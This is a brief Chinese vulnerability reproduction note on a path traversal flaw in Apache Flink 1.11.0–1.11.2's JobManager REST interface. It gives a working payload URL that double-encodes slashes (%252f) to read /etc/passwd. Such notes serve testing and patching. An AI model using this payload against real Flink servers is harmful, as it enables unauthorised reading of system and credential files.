文章目录
一、漏洞简介二、漏洞复现一、漏洞简介
Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。
影响版本:1.11.0、1.11.1、1.11.2
二、漏洞复现
Payload:192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
对/
进行二次编码%252f